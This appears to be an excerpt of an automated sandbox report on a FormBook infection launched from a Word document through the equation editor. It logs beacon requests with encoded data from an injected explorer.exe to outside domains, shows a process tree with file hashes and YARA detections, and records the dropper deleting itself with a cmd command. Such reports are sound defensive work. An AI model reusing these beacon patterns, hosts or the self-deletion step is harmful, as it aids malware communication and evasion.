                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.224917034.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:18:53.504982948 CET755OUTGET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.muzicalbox.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:18:53.620393038 CET756INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 13 Jan 2022 17:18:53 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6192576d-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.2249171109.94.209.12380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:18:58.849119902 CET757OUTGET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.extraordinarymiracle.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:18:58.928126097 CET757INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.20.1
                                                                          Date: Thu, 13 Jan 2022 17:18:58 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 169
                                                                          Connection: close
                                                                          Location: https://www.extraordinarymiracle.com:443/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.224917291.195.240.1380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:19:03.995932102 CET758OUTGET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.realstakepool.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:19:04.058167934 CET760INHTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==
                                                                          Last-Modified: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          X-Cache-Miss-From: parking-78bc4f798d-jmf9p
                                                                          Server: NginX
                                                                          Data Raw: 35 63 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 32 4d 6b 39 45 68 6f 70 62 58 4d 75 34 32 65 61 76 67 4b 31 79 58 45 34 50 67 6c 73 52 76 52 38 71 6a 61 56 6c 32 6d 4e 56 42 53 69 7a 4b 52 38 57 55 6d 62 31 57 61 2b 62 75 66 6c 63 6d 33 6d 64 34 63 6c 57 51 67 59 51 59 44 34 6a 55 31 56 65 54 58 6c 51 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 51 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 20 c3 a8 20 69 6e 20 76 65 6e 64 69 74 61 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 20 52 69 73 6f 72 73 65 20 65 20 69 6e 66 6f 72 6d 61 7a 69 6f 6e 65 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 51 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 20 c3 a8 20 69 6e 20 76 65 6e 64 69 74 61 21 20 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 20 c3 a8 20 6c 61 20 70 72 69 6d 61 20 65 20 6d 69 67 6c 69 6f 72 20 66 6f 6e 74 65 20 70 65 72 20 74 75 74 74 65 20 6c 65 20 69 6e 66 6f 72 6d 61 7a 69 6f 6e 69 20 72 69 63 65 72 63 61 74 65 2e 20 44 61 20 74 65 6d 69 20 67 65 6e 65 72 61 6c 69 20 61 20
                                                                          Data Ascii: 5c51<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==><head><meta charset="utf-8"><title>realstakepool.com&nbsp;-&nbsp;Questo sito web in vendita!&nbsp;-&nbsp;realstakepool Risorse e informazione.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Questo sito web in vendita! realstakepool.com la prima e miglior fonte per tutte le informazioni ricercate. Da temi generali a


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: WINWORD.EXE PID: 2644 Parent PID: 596

                                                                          General

                                                                          Start time:18:16:16
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                          Imagebase:0x13f140000
                                                                          File size:1423704 bytes
                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: EQNEDT32.EXE PID: 1124 Parent PID: 596

                                                                          General

                                                                          Start time:18:16:18
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: medicomsh78694.exe PID: 2824 Parent PID: 1124

                                                                          General

                                                                          Start time:18:16:19
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 34%, Metadefender, Browse
                                                                          • Detection: 51%, ReversingLabs
                                                                          Reputation:low

                                                                          Analysis Process: medicomsh78694.exe PID: 2008 Parent PID: 2824

                                                                          General

                                                                          Start time:18:16:24
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:{path}
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Analysis Process: explorer.exe PID: 1764 Parent PID: 2008

                                                                          General

                                                                          Start time:18:16:27
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0xffa10000
                                                                          File size:3229696 bytes
                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          Analysis Process: msdt.exe PID: 2848 Parent PID: 1764

                                                                          General

                                                                          Start time:18:16:40
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                          Imagebase:0xc40000
                                                                          File size:983040 bytes
                                                                          MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          Analysis Process: cmd.exe PID: 448 Parent PID: 2848

                                                                          General

                                                                          Start time:18:16:44
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
                                                                          Imagebase:0x4a2b0000
                                                                          File size:302592 bytes
                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >